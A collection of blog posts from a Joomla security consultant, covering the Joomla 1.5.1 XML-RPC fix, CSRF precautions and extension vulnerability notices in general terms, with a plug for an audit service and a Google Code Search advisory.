The Joomla Core team have today released Joomla 1.5.1 to specifically address a security issue,

The official announcement was:

The Joomla! community is pleased to announce the immediate availability of Joomla! 1.5.1 [Seenu].  Since the stable release of Joomla! 1.5 we have seen huge numbers of downloads which has helped to push the total number of downloads to over 3 million in less than a year.

We have found in one of the new features of Joomla! 1.5, an XML-RPC Blogger API plugin, a high priority security vulnerability.  While this feature is disabled by default on every Joomla! 1.5 install and would have to be manually enabled for the vulnerability to exist, we strongly recommend that all Joomla! 1.5 users upgrade to Joomla! 1.5.1.

Thanks to the work done by both the Joomla! Bug Squad as well as the Development Team , not only has this vulnerability been patched but so have several other smaller issues.

The core developers of Joomla! have just released a statement about a security exploit in Joomla 1.5.0

After releasing Joomla! 1.5 stable we have discovered a high priority security issue.

The vulnerability has been discovered in XML-RPC in combination with the blogger API.

There is a security problem in this code that makes it possible to alter the articles

on your site (including removal). This problems has been fixed currently by members

of the development team and the Joomla! bug squad, solution is now available from

Subversion. So what do you need to do until we release Joomla! 1.5.1?
All Joomla! users who have enabled the XML-RPC Blogger API plugin should disable it!

If you have never enabled this plugin you do not need to do anything.

This comes hot on the tail of an xml-rpc issue in wordpress also !

A lot of talk has gone on recently regarding CSRF and Joomla 1.0.13/1.5. CSRF is a problem for all web based applications and the upcoming Joomla 1.0.14 and Joomla 1.5 stable have both been hardened against such security vulnerabilities. Hardened, not made secure, as it is practically impossible to secure against each and every CSRF there is without interrupting workflow. Joomla, as do most other webapps, has made it as difficult as possible to use CSRF to hack a Joomla site.

The advice issued by ourselves recently is still just as valid now as it will be when Joomla 1.0.14/1.5 are released - Please follow these rules:

- ALWAYS click LOGOUT in Joomla Admin when you finish
- NEVER browse other websites while logged in to Joomla Admin
- If you allow users to upload/modify your site through any third party component then don’t browse/or limit your surfing of your own site while logged in to Joomla Admin
- NEVER click on links to “Upgrade this component” in 3rd Party Components
- NEVER browse forums while logged into Joomla Admin

However, there is always a better, more secure option,

Introducing PRISM

Prism (formerly, Webrunner) is a prototype application that lets users split web applications out of their browser and run them directly on their desktop. What this really means in non-techie speak is that you can launch a scaled down web browser in its own process and use that to administrator your Joomla Site. Prism is a scaled down Firefox web browser that is designed for web applications - so already its more secure as its not Internet Explorer based :-)

We have been highly active in using webrunner/prism since the first release - and we are addicted.

Learn More

• Introduction to Prism
• Prism Prototype Now Available for Mac and Linux

Get Prism

• Download Prism for Windows
• Download Prism for Mac OS X
• Download Prism for Linux

Once you have prism installed, simply double click its icon and you will be prompted to give a URL and NAME (and a few optional options).

For the URL set this as your admin console - like http://www.mysite.com/administrator/

and the NAME set to “Administrator for mySite” - also check the desktop shortcut icon.

Then you will be promptly shown your admin page - you can now login securely and continue administrating your Joomla site in Prism and NOT IN YOUR REGULAR BROWSER - this creates separation between your normal surfing and your Joomla Administrator.

By doing this you 100% protect yourself from the CSRF vulnerability reported in Joomla and other web apps - once you get addicted (as are we) to Prism you will never use your browser for web applications again!!!

Hope you like the tip!

We write this blog post with sadness. On the 4th December 2007 a nice white hat hacker notified the Joomla Core Development team of a CSRF Vulnerability in Joomla 1.0.13 and Joomla 1.5 RC3.There have been many reports of these vulnerabilities around the web since then.

The nature of the vulnerability means that your site cannot be hacked while you sleep (like many of the other types of 3rd party component issues), but requires you (the sites Super Admin) to be logged into Joomla Admin while at the same time surfing sites (maybe even your own) that contain links to [THINGS] that send [NAUGHTY] requests back to your Joomla Admin Console without you knowing. This can lead to complete disaster and even complete server compromise.

The Joomla Developers took only 4 days to fix this in Joomla 1.5 SVN and then shortly after released Joomla 1.5 RC4 stating they had fixed this category A5 Security [High] Vulnerability.

To date, no changes and no attempts by the core development team have been made to the Joomla 1.0.13+ SVN tree to fix this vulnerability in Joomla 1.0.13 Update: Changes are now in SVN for the next version of Joomla 1.0.x - about time!

In an effort to assist them we spent a few hours and backported code from Joomla 1.5 RC4 to Joomla 1.0.13 and made all the changes required to fix Joomla 1.0.13 and make it secure from this type of vulnerability.

Details of this can be found in the following forum thread:

http://forum.joomla.org/index.php/topic,248109.msg1136076.html#msg1136076

I personally emailed all three lead developers with the same information as I published there, including providing the diff/patch files to Joomla 1.0.13. I have been assured that once Joomla 1.5 stable is released time will be spent on fixing this issue in Joomla 1.0.13 (I object to this - why take 4 days to fix unreleased software and over 4 weeks to fix software running on millions of sites already?!?)

Here is my professional advice to help you stay safe from the known and publish vulnerability until the next version of Joomla 1.0.x is released.

The number one bit of advice I can give all site admins at the moment is to - LOGOUT OF YOUR JOOMLA ADMIN as soon as you finish using it, and do not surf around the internet in other tabs/browser windows while administrating your Joomla site, and if you allow users to modify your site’s frontend, be careful not to surf your frontend as well while logged in.

Do not install any 3rd party components/mambots/modules/AND TEMPLATES!!! from untrusted sources, if these components choose they can use this vulnerability to do[BAD] things…

There are reports circulating this Christmas Eve that the modules provided by mosDirectory v2.3.2 are vulnerable to a remote file inclusion.

Having reviewed the code I can confirm that, under the right circumstances, this can happen with all versions up until mosDirectory v2.3.7.

The modules provided by mosDirectory are all community/customer developed and submitted and added into mosDirectory by request.  It appears that our quality control missed this single line of code - and for this we are very sorry - the code in this file has not changed for almost two years and has never been flagged as an issue before, we now have automated nightly builds that check for this kind of security issue.

There are no reported cases of a Joomla site being hacked through mosDirectory
There are no reported cases of a Joomla site being hacked through this vulnerability in the module.
The vulnerability in a module - not in the main mosDirectory component

If you are using the htaccess file provided by Joomla then you are not vulnerable - however all customers should upgrade to the latest mosDirectory v2.4.0 as soon as possible to ensure that you are full protected.

The latest version of mosDirectory v2.4.0 can be downloaded by logging into your account at http://secure.myjoomla.com/

Full details of patching your site have been emailed to every customer. If you missed this email then please contact us at phil@phil-taylor.com ASAP

For many years I hace steered people away from the Fasthosts web hosting company. They are based in Gloucester, UK, my home town and the local word on the street has always be negative towards them.

I was not surprised that one of my customers who has an old fasthosts account received the following email from them this week - stating that their internal systems had been hacked!

Simply amazing! - There is nothing about this on their website - I guess they want to keep it on the low!

Ever since the conception of Mambo/Joomla the passwords for admins and users have been converted into a md5 hash string and stored to the database.

In Joomla 1.0.13 (About time too!) this has changed.  The password is now “salted” and then md5 hashed with the salt, the salt and the password are both stored in the database.

This means that Joomla 1.0.13 breaks backwards compatibility with itself (you can’t downgrade to anything before joomla 1.0.13), and with some extensions like Community Builder and Forum bridges!!

Basically any 3rd Party Component that reads/writes/validates the password of an admin or user will now FAIL in Joomla 1.0.13 unless it is updated to know about the new changes.

The salting of passwords is a good security step - we praise the core team for doing it - HOWEVER no announcement has been made about this, no blog post has been made and users are now in the dark - remember, this means you can NEVER DOWNGRADE your site if you have problems so make sure you MAKE A BACKUP before upgrading to Joomla 1.0.13 - you have now been warned!

The current version of Phil-A-Form is v1.6.3 - and is secure (as far as we know).

We have just been alerted to having a security vulnerability  in VERSION 1.2 (Over a year old!) with SQL injection that allows a hacker to gain the md5 hash of the admin password on a Joomla Site.

We know MANY customers are still running Phil-a-form v1.2 which is vulnerable, in our tests we managed to get information from all the sites tested!

We are also aware that version 1.2 of Phil-A-Form is available on some warez/illegal sites.

Only versions less than v1.2 are vulnerable. PLEASE UPGRADE PHIL-A-FORM if you are not running the latest version.

This is another reason for making sure that all Joomla Components are kept up-to-date!

Due to recent popular demand we are publishing details about a service that we have been providing for some time now for existing customers, but now we are opening it up to all sites.

We offer a private and confidential service to customers that will reveal all known security vulnerabilities with your server and Joomla/Joomla Components.

For that we use professional industry standard software to scan your Joomla website for any unknown and known flaws - this tests the web pages.

We then use ScanAlert (A very expensive system) to do a one-time indepth scan of the server, domain and much more - this gives us a huge report - more details on scanalert can be found at scanalert.com, lastly we do a manual audit of your website, this means we manually review your websites PHP files, 3pd party components/modules/mambots, and also compare versions of these against known issues (Plus we use our full experience with Joomla to provide an indepth service)

If you have full root access to your server we can further secure the server against know attacks - an additional fee is payable for this service as different skill sets are required and can be more time consuming. Depending on the results of the audit this may be a recommended step - however the costs of this are not included in the audit fee.

We will provide you with a list of issues that we find, what you do with that information then is up to you - if you are on shared hosting there may be little you can do (apart from the obvious Joomla and Joomla Component audit recommendations). If you have a dedicated server we can secure your server and Joomla installations to meet the very strict PCI Certification scheme run by MasterCard and Visa card providers. We can work with you to fully secure your dedicated server and even provide monthly audits or monitoring if you wish.

To find out more, commission an audit or to talk to us further about this service please visit http://www.joomla-expert.com, call us in the UK on 0800 358 5499 or email us

Well maybe, Now I have got your attention, read the following information published by the Joomla Core team.
Joomla! Developer Network
It has come to our attention that Google has released a new product, Google Code Search, that is capable of indexing and crawling through archive files stored in the public directories of web servers. We are reporting this as a security advisory because we have discovered that some site administrators are storing archives / backups of their website in the web root. Because of this, Google Code Search is able to crawl the archives and read unparsed PHP files as if they were plain text. This has resulted in the disclosure of some sensitive information including MySQL passwords and SMTP credentials.

We felt that it was necessary to release a general advisory now in order to warn the sites that have been exposed as well as to protect and educate our users on some best practices in order to keep your site secure.

1. Never store a backup or archived version of your website in a web server’s public readable directories.
2. Do not leave files that you do not want to be read/indexed/searched/downloaded in the web root.
3. If it is absolutely necessary, make your hosting provider disable directory index generation for that directory.*
4. Password protect directories that contain sensitive information.

Futhermore, if you think your site’s login credentials may have been compromised in this way, please remove the backups / archives stored in the web root, change all of the associated passwords, and if necessary, ask your hosting provider to restore your site from a previous backup and be sure that they clean up after themselves and remove the archive that they used to restore your site.

If you would like more proactive protection against the indexing and downloading of related archives, please see this thread in the Joomla! Security Forums where some discussion is being held on how to protect yourself from these problems. http://forum.joomla.org/index.php/topic,101880.0.html

* Directory Indexing is a feature of mod_dir, an Apache module that will generate a list of all files in a directory if there is no index.html/php/etc file found in that directory. This is most likely how the archives are being found by Google Code Search.